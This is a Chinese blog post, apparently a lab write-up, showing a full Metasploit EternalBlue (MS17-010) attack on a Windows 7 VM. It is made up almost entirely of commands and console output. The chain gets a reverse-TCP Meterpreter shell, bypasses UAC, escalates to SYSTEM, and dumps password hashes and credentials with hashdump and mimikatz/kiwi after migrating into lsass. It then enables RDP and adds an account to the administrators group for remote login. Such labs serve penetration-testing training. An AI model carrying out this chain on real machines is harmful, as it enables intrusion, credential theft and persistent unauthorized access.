MSF渗透永恒之蓝

最新推荐文章于 2024-05-31 07:23:48 发布
最新推荐文章于 2024-05-31 07:23:48 发布
阅读量924 收藏 3
点赞数
文章标签: windows linux 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nnjnknkj/article/details/128474843
版权

MSF

kali 192.168.44.131
win7 192.168.44.137

#进入msf

msfconsole

搜索永恒之蓝

$search ms17-010


Matching Modules
================

   #  Name                                      Disclosure Date  Rank     Check  Description
   -  ----                                      ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   2  auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   3  auxiliary/scanner/smb/smb_ms17_010                         normal   No     MS17-010 SMB RCE Detection
   4  exploit/windows/smb/smb_doublepulsar_rce  2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution


Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce

$use 0
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > 

msf6 exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT          445              yes       The target port (TCP)
   SMBDomain                       no        (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 t
                                             arget machines.
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 targe
                                             t machines.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines
                                             .


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.44.131   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

#设置受害机IP
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.44.137
rhost => 192.168.44.137

#设置攻击机IP

msf6 exploit(multi/handler) > set lhost 192.168.44.131
lhost => 192.168.44.131

#设置攻击机端口 随意设置

msf6 exploit(multi/handler) > set lport 4444
lport => 4444

#监听

msf6 exploit(multi/handler) > run
[] Started reverse TCP handler on 192.168.44.131:4444
[] Sending stage (175174 bytes) to 192.168.44.137
[*] Meterpreter session 9 opened (192.168.44.131:4444 -> 192.168.44.137:51323 ) at 2022-05-10 00:12:08 -0400

#获取到受害机 挂载在后台

meterpreter > background
[*] Backgrounding session 9…

## 3. 提权

#绕过uac 使用bypassuas

msf6 exploit(multi/handler) > use exploit/windows/local/bypassuac
[*] Using configured payload windows/meterpreter/reverse_tcp

#设置会话

msf6 exploit(windows/local/bypassuac) > set session 9
session => 9

#运行绕过

msf6 exploit(windows/local/bypassuac) > run

[!] SESSION may not be compatible with this module:
[!] * missing Meterpreter features: stdapi_sys_process_set_term_size
[] Started reverse TCP handler on 192.168.44.131:4444
[] UAC is Enabled, checking level…
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing…
[+] Part of Administrators group! Continuing…
[] Uploaded the agent to the filesystem…
[] Uploading the bypass UAC executable to the filesystem…
[] Meterpreter stager executable 73802 bytes long being uploaded…
[] Sending stage (175174 bytes) to 192.168.44.137
[*] Meterpreter session 10 opened (192.168.44.131:4444 -> 192.168.44.137:52055 ) at 2022-05-10 00:12:59 -0400

#绕过完成 获取当前用户名

meterpreter > getuid
Server username: root-PC\root

#提权

meterpreter > getsystem
…got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).

#获取当前用户名

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

#获取受害机的密码的哈希值 md5加密 第一种获取明文密码的方式

meterpreter > run hashdump

[!] Meterpreter scripts are deprecated. Try post/windows/gather/smart_hashdump.
[!] Example: run post/windows/gather/smart_hashdump OPTION=value […]
[] Obtaining the boot key…
[] Calculating the hboot key using SYSKEY 7481dac7418852c914b1f37ca9f2b1c6…
[] Obtaining the user list and keys…
[] Decrypting user keys…
[*] Dumping password hints…

No users with password hints on this system

[*] Dumping password hashes…

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
root:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
001:1001:aad3b435b51404eeaad3b435b51404ee:3ef260ff1958f87ffd63b7d64705b396:::
003:1002:aad3b435b51404eeaad3b435b51404ee:cf31750ebd133c6882c95af971e62a7c:::

#导出受害机的密码哈希值 第一种获取明文密码的方式

meterpreter > run windows/gather/smart_hashdump

[!] SESSION may not be compatible with this module:
[!] * missing Meterpreter features: stdapi_sys_process_set_term_size
[] Running module against ROOT-PC
[] Hashes will be saved to the database if one is connected.
[+] Hashes will be saved in loot in JtR password file format to:
[] /root/.msf4/loot/20220510003633_default_192.168.44.137_windows.hashes_755360.txt
[] Dumping password hashes…
[] Running as SYSTEM extracting hashes from registry
[] Obtaining the boot key…
[] Calculating the hboot key using SYSKEY 7481dac7418852c914b1f37ca9f2b1c6…
[] Obtaining the user list and keys…
[] Decrypting user keys…
[] Dumping password hints…
[] No users with password hints on this system
[] Dumping password hashes…
[+] Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+] root:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+] 001:1001:aad3b435b51404eeaad3b435b51404ee:3ef260ff1958f87ffd63b7d64705b396:::
[+] 003:1002:aad3b435b51404eeaad3b435b51404ee:cf31750ebd133c6882c95af971e62a7c:::

#获取账户名明文密码 加载kiwi模块

meterpreter > load kiwi
Loading extension kiwi…
.#####. mimikatz 2.2.0 20191125 (x86/windows)
.## ^ ##. “A La Vie, A L’Amour” - (oe.eo)

/ \ ## /*** Benjamin DELPY gentilkiwi ( benjamin@gentilkiwi.com )

\ / ## > http://blog.gentilkiwi.com/mimikatz

‘## v ##’ Vincent LE TOUX ( vincent.letoux@gmail.com )
‘#####’ > http://pingcastle.com / http://mysmartlogon.com ***/

[!] Loaded x86 Kiwi on an x64 architecture.

Success.

#kiwi不能在x64运行 ==必须要内存迁移==

meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials

meterpreter > kiwi_cmd sekurlsa::logonpasswords
ERROR kuhl_m_sekurlsa_acquireLSA ; mimikatz x86 cannot access x64 process

meterpreter > ps

Process List

PID PPID Name Arch Session User Path

0 0 [System Process]
4 0 System x64 0
244 4 smss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\smss.exe
292 492 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
336 320 csrss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe
388 320 wininit.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\wininit.exe
396 380 csrss.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe
432 380 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\winlogon.exe
460 396 conhost.exe x64 1 root-PC\root C:\Windows\System32\conhost.exe
492 388 services.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\services.exe
500 388 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsass.exe
508 388 lsm.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsm.exe
604 492 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
680 492 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
764 492 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
804 492 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
856 492 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1000 492 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1104 804 dwm.exe x64 1 root-PC\root C:\Windows\System32\dwm.exe
1132 1092 explorer.exe x64 1 root-PC\root C:\Windows\explorer.exe
1172 492 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe
1192 492 taskhost.exe x64 1 root-PC\root C:\Windows\System32\taskhost.exe
1280 492 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1428 492 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1456 396 conhost.exe x64 1 root-PC\root C:\Windows\System32\conhost.exe
1496 1132 vm3dservice.exe x64 1 root-PC\root C:\Windows\System32\vm3dservice.exe
1504 1132 vmtoolsd.exe x64 1 root-PC\root C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
1712 1528 jusched.exe x86 1 root-PC\root C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
1728 1528 Kernel32.exe x86 1 root-PC\root C:\Windows\SysWOW64\Kernel32.exe
1820 492 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
1844 492 nessus-service.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Tenable\Nessus\nessus-service.exe
1868 492 VGAuthService.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe
1876 1844 nessusd.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Tenable\Nessus\nessusd.exe
1912 492 vmtoolsd.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
2016 776 PDdXBksB.exe x86 1 root-PC\root C:\Users\root\AppData\Local\Temp\PDdXBksB.exe
2040 2056 chrome.exe x86 1 root-PC\root C:\Users\root\AppData\Local\Google\Chrome\Application\chrome.exe
2056 1132 chrome.exe x86 1 root-PC\root C:\Users\root\AppData\Local\Google\Chrome\Application\chrome.exe
2060 2056 chrome.exe x86 1 root-PC\root C:\Users\root\AppData\Local\Google\Chrome\Application\chrome.exe
2068 2056 chrome.exe x86 1 root-PC\root C:\Users\root\AppData\Local\Google\Chrome\Application\chrome.exe
2128 604 WmiPrvSE.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\wbem\WmiPrvSE.exe
2212 492 dllhost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\dllhost.exe
2360 492 msdtc.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\msdtc.exe
2572 492 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
2576 2056 chrome.exe x86 1 root-PC\root C:\Users\root\AppData\Local\Google\Chrome\Application\chrome.exe
2604 492 SearchIndexer.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\SearchIndexer.exe
2744 2056 chrome.exe x86 1 root-PC\root C:\Users\root\AppData\Local\Google\Chrome\Application\chrome.exe
2848 4300 cmd.exe x86 1 root-PC\root C:\Windows\SysWOW64\cmd.exe
3120 1132 shell.exe x86 1 root-PC\root C:\Users\root\Desktop\shell.exe
3136 4328 httpd.exe x86 1 root-PC\root C:\phpStudy\PHPTutorial\Apache\bin\httpd.exe
3452 396 conhost.exe x64 1 root-PC\root C:\Windows\System32\conhost.exe
3740 396 conhost.exe x64 1 root-PC\root C:\Windows\System32\conhost.exe
3804 1132 firefox.exe x86 1 root-PC\root C:\Users\root\Desktop\Firefox 49.0.1 渗透便携版 90SEC beta6\Firefox\firefox\firefox.exe
4028 2056 chrome.exe x86 1 root-PC\root C:\Users\root\AppData\Local\Google\Chrome\Application\chrome.exe
4328 5220 httpd.exe x86 1 root-PC\root C:\phpStudy\PHPTutorial\Apache\bin\httpd.exe
4436 5736 wemeetapp.exe x86 1 root-PC\root C:\Program Files (x86)\Tencent\WeMeet\wemeetapp.exe
4688 5220 mysqld.exe x86 1 root-PC\root C:\phpStudy\PHPTutorial\MySQL\bin\mysqld.exe
4700 5328 java.exe x64 1 root-PC\root C:\Program Files (x86)\java\bin\java.exe
4756 2684 ggjfmL.exe x86 1 root-PC\root C:\Users\root\AppData\Local\Temp\ggjfmL.exe
4976 5800 TBSWebRenderer.exe x86 1 root-PC\root C:\Program Files (x86)\Tencent\WeMeet\3.7.9.426\TBSWebRenderer.exe
5060 5800 TBSWebRenderer.exe x86 1 root-PC\root C:\Program Files (x86)\Tencent\WeMeet\3.7.9.426\TBSWebRenderer.exe
5220 5180 phpStudy.exe x86 1 root-PC\root C:\phpStudy\phpStudy.exe
5328 5604 java.exe x64 1 root-PC\root C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_1081258\java.exe
5604 4304 cmd.exe x64 1 root-PC\root C:\Windows\System32\cmd.exe
5736 5668 wemeetapp.exe x86 1 root-PC\root C:\Program Files (x86)\Tencent\WeMeet\wemeetapp.exe
5800 5736 wemeetapp.exe x86 1 root-PC\root C:\Program Files (x86)\Tencent\WeMeet\wemeetapp.exe
6084 5800 wemeetapp.exe x86 1 root-PC\root C:\Program Files (x86)\Tencent\WeMeet\wemeetapp.exe
6092 5800 wemeetapp.exe x86 1 root-PC\root C:\Program Files (x86)\Tencent\WeMeet\wemeetapp.exe

#lsass.exe 的内存迁移

meterpreter > migrate 500
[] Migrating from 4756 to 500…
[] Migration completed successfully.

#第二种获取明文密码

meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials

Username Domain LM NTLM SHA1

root root-PC aad3b435b51404eeaad3b435b51404ee 31d6cfe0d16ae931b73c59d7e0c089c0 da39a3ee5e6b4b0d3255bfef95601890afd80709

wdigest credentials

Username Domain Password

(null) (null) (null)
ROOT-PC$ WORKGROUP (null)
root root-PC (null)

tspkg credentials

Username Domain Password

root root-PC (null)

kerberos credentials

Username Domain Password

(null) (null) (null)
root root-PC (null)
root-pc$ WORKGROUP (null)

#第三种明文获取办法

meterpreter > kiwi_cmd sekurlsa::logonpasswords

Authentication Id : 0 ; 85913 (00000000:00014f99)
Session : Interactive from 1
User Name : root
Domain : root-PC
Logon Server : ROOT-PC
Logon Time : 2022/5/9 17:17:02
SID : S-1-5-21-2889893998-2302651844-2107436998-1000
msv :
[00000003] Primary
* Username : root
* Domain : root-PC
* LM : aad3b435b51404eeaad3b435b51404ee
* NTLM : 31d6cfe0d16ae931b73c59d7e0c089c0
* SHA1 : da39a3ee5e6b4b0d3255bfef95601890afd80709
tspkg :
* Username : root
* Domain : root-PC
* Password : (null)
wdigest :
* Username : root
* Domain : root-PC
* Password : (null)
kerberos :
* Username : root
* Domain : root-PC
* Password : (null)
ssp :
credman :

Authentication Id : 0 ; 85874 (00000000:00014f72)
Session : Interactive from 1
User Name : root
Domain : root-PC
Logon Server : ROOT-PC
Logon Time : 2022/5/9 17:17:02
SID : S-1-5-21-2889893998-2302651844-2107436998-1000
msv :
[00000003] Primary
* Username : root
* Domain : root-PC
* LM : aad3b435b51404eeaad3b435b51404ee
* NTLM : 31d6cfe0d16ae931b73c59d7e0c089c0
* SHA1 : da39a3ee5e6b4b0d3255bfef95601890afd80709
tspkg :
* Username : root
* Domain : root-PC
* Password : (null)
wdigest :
* Username : root
* Domain : root-PC
* Password : (null)
kerberos :
* Username : root
* Domain : root-PC
* Password : (null)
ssp :
credman :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2022/5/9 17:17:02
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :

Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : ROOT-PC$
Domain : WORKGROUP
Logon Server : (null)
Logon Time : 2022/5/9 17:17:02
SID : S-1-5-20
msv :
tspkg :
wdigest :
* Username : ROOT-PC$
* Domain : WORKGROUP
* Password : (null)
kerberos :
* Username : root-pc$
* Domain : WORKGROUP
* Password : (null)
ssp :
credman :

Authentication Id : 0 ; 46650 (00000000:0000b63a)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 2022/5/9 17:17:01
SID :
msv :
tspkg :
wdigest :
kerberos :
ssp :
credman :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : ROOT-PC$
Domain : WORKGROUP
Logon Server : (null)
Logon Time : 2022/5/9 17:17:01
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : ROOT-PC$
* Domain : WORKGROUP
* Password : (null)
kerberos :
* Username : root-pc$
* Domain : WORKGROUP
* Password : (null)
ssp :
credman :

## 4. 远程连接
       
#开启远程登录

meterpreter > run post/windows/manage/enable_rdp

[!] SESSION may not be compatible with this module:
[!] * missing Meterpreter features: extapi_adsi_domain_query, extapi_clipboard_get_data, extapi_clipboard_monitor_dump, extapi_clipboard_monitor_pause, extapi_clipboard_monitor_purge, extapi_clipboard_monitor_resume, extapi_clipboard_monitor_start, extapi_clipboard_monitor_stop, extapi_clipboard_set_data, extapi_ntds_parse, extapi_pageant_send_query, extapi_service_control, extapi_service_enum, extapi_service_query, extapi_window_enum, extapi_wmi_query, stdapi_sys_process_set_term_size
[] Enabling Remote Desktop
[] RDP is already enabled
[] Setting Terminal Services service startup mode
[] Terminal Services service is already set to auto
[] Opening port in local firewall if necessary
[] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20220510004616_default_192.168.44.137_host.windows.cle_560551.txt

#进入受害机shell

meterpreter > shell
Process 1484 created.
Channel 2 created.
Microsoft Windows [�汾 6.1.7601]
��Ȩ���� © 2009 Microsoft Corporation����������Ȩ����

#转换编码 因为windows和linux 编码不同导致的编码

C:\Windows\system32>chcp 65001
chcp 65001
Active code page: 65001

#查看当前的服务状态

C:\Windows\system32>net start
net start
These Windows services are started:

Application Experience
Application Information
Background Intelligent Transfer Service
Base Filtering Engine
Certificate Propagation
COM+ Event System
COM+ System Application
Computer Browser
Cryptographic Services
DCOM Server Process Launcher
Desktop Window Manager Session Manager
DHCP Client
Diagnostic Policy Service
Diagnostic Service Host
Distributed Link Tracking Client
Distributed Transaction Coordinator
DNS Client
Function Discovery Resource Publication
Group Policy Client
IKE and AuthIP IPsec Keying Modules
IP Helper
IPsec Policy Agent
Multimedia Class Scheduler
Network Connections
Network List Service
Network Location Awareness
Network Store Interface Service
Offline Files
Plug and Play
Power
Print Spooler
Program Compatibility Assistant Service
Remote Desktop Configuration
Remote Desktop Services
Remote Desktop Services UserMode Port Redirector
Remote Procedure Call (RPC)
RPC Endpoint Mapper
Secondary Logon
Security Accounts Manager
Security Center
Server
Shell Hardware Detection
SSDP Discovery
System Event Notification Service
Task Scheduler
TCP/IP NetBIOS Helper
Tenable Nessus
Themes
User Profile Service
VMware Alias Manager and Ticket Service
VMware Tools
Windows Audio
Windows Audio Endpoint Builder
Windows Defender
Windows Event Log
Windows Firewall
Windows Font Cache Service
Windows Management Instrumentation
Windows Search
Windows Update
Workstation

The command completed successfully.

#将创建的用户添加到administrators的用户组 达到远程登录的原因

C:\Windows\system32>net localgroup administrators 001 /add
net localgroup administrators 001 /add
The command completed successfully.

## 演示

rdesktop 192.168.44.137 -u 001

小菜鸟的修炼之路
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
MSF之利用永恒之
m0_51428325的博客
11-21 1100
永恒之: 永恒之(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。 SMB: SMB(Server Message Block...
0x20.第二十课 MetaSploit检测并复现永恒之.pdf
06-24
0x20.第二十课 MetaSploit检测并复现永恒之.pdf
2021-04-06-MSF之永恒之
qq_50963064的博客
11-16 3545
MSF之ms17-010永恒之漏洞利用 准备 实验环境: 攻击机:虚拟机Kali系统 IP:192.168.216.130 被攻击机:虚拟机win7 x64系统(关闭防火墙) IP:192.168.216.131 攻击工具:Kali自带的msfconsole工具 开始实验 1.进入MSF(可以终端进入也可以搜索在工具栏打开): 终端命令:msfconsole (root权限打开) 2.查找永恒之对应的模块: search ms17-010 3.利用辅助模块(auxiliary)进行探测信息,扫描
Kali--MSF-永恒之详解(复现、演示、远程、后门、加壳、修复)
最新发布
dzqxwzoe的博客
05-31 1064
永恒之(EternalBlue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日,不法分子通过改造“永恒之”制作了wannacry程序,使全世界大范围内遭受了该程序,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。但不过在该程序出来不久就被微软通过打补丁修复了。为了维持操作系统的安全,我们能做到的是及时更新,安装补丁,关闭不必要的服务和端口。
MSF永恒之使用
Brucye
04-02 858
MSF永恒之MS17-010 1. 扫描漏洞 use auxiliary/scanner/smb/smb_ms17_010(加载模块扫描exp) set RHOSTS 192.168.167.60(设置被扫描ip) run(开始扫描,查看是否存在漏洞) 检测到可以使用永恒之 2. 漏洞攻击 use exploit/windows/smb/ms17_010_eternalblue(加载攻击模块) set RHOSTS 192.168.167.60(被攻击IP) set LHOST 192.168.
小计一次永恒之实战
08-20
一次局域网内的永恒之实战,msf的一次小实战。
浅谈MSF渗透测试
02-24
渗透过程中,MSF漏洞利用神器是不可或缺的。更何况它是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。是信息收集、...
永恒之配置Windows7
10-24
本文将讲解如何使用 Kali Linux 中的 MSF-Metasploit 来利用永恒之漏洞入侵 Windows7 系统。 一、准备工作 在开始之前,我们需要准备好攻击机和靶机。攻击机使用 Kali Linux 操作系统,IP 地址为 192.168.1.10,...
MSF复现MS17-010漏洞(永恒之
weixin_51151498的博客
02-07 536
ms17-010
使用msf--永恒之攻击模块windows2008 R2 虚机
qq_43348375的博客
08-26 2987
使用msf–永恒之攻击模块windows2008 R2 虚机 准备:kali虚机、window2008 R2 虚拟 做之前请保证kali可以ping通win2008 kali的IP地址是192.168.29.128 win2008的IP地址是192.168.29.129 首先进入kali的msf msf是集成在kali镜像中的攻击框架,里面继承了许多的漏洞和攻击载荷,下面就让我们一睹它的风采吧。...
使用msf复现ms17-010永恒之
meditate的博客
03-04 4957
**** 复现永恒之**** 一,准备工作: 1. kali系统: 可以直接装在物理机上,也可以装在VMware虚拟机上。(个人推荐装在虚拟机上) 2. 信息收集工作: 1)获取目标机地址:192.168.1.68 我在这里用的是win7的虚拟机,查找win7的IP:按下win+R后输入cmd进入终端,输入ipconfig查看IP地址。 2)获取攻击机地址:192.168.1.6 这里指kali...
MSF框架实现“永恒之”的闪电***
weixin_34121282的博客
11-20 157
MSF框架实现“永恒之”的闪电*** 转载于:https://blog.51cto.com/7829986/1983423
msfconsole中永恒之的操作与应用
qq_59020256的博客
03-11 566
help #获取所有可用命令getuid #获取当前权限screenshot #截屏hashdump #获取密码的hashps #获取进程列表sysinfo #获取系统信息route #获取路由表getpid #获取当前攻入的进程pidmigrate #将当前后门注入迁移到其他程序keyscan_start # 开启键盘记录keyscan_dump #显示键盘记录 使用永恒之攻入的session默认不能进行键盘记录 ,如果迁移到其他程序就可以做,比如notepad.exe。
msf之ms17-010永恒之漏洞
AI_SumSky的博客
06-27 6890
**** 1.熟悉msf的基本用法。 2.熟悉一些渗透中会用到基本的windows命令。 3.复现永恒之漏洞。通过向Windows服务器的SMBv1服务发送精心构造的命令造成溢出,最终导致任意命令的执行。在Windows操作系统中,SMB服务默认是开启的,监听端口默认为445,因此该漏洞造成的影响极大。**** 1.打开MSF默认已经集成了MS17-010漏洞的测试模块 利用search语法查找ms17-010 2.探测主机是否存在漏洞,利用use命令选择第三个测试接口,可探查主机是否存在永恒之漏洞
使用MSF复现永恒之
11-27
为了使用MSF复现永恒之漏洞,可以按照以下步骤进行操作: 1. 打开终端并启动msfconsole,输入以下命令: ```shell msfconsole ``` 2. 在msfconsole中,使用search命令搜索ms17-010漏洞: ```shell search ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值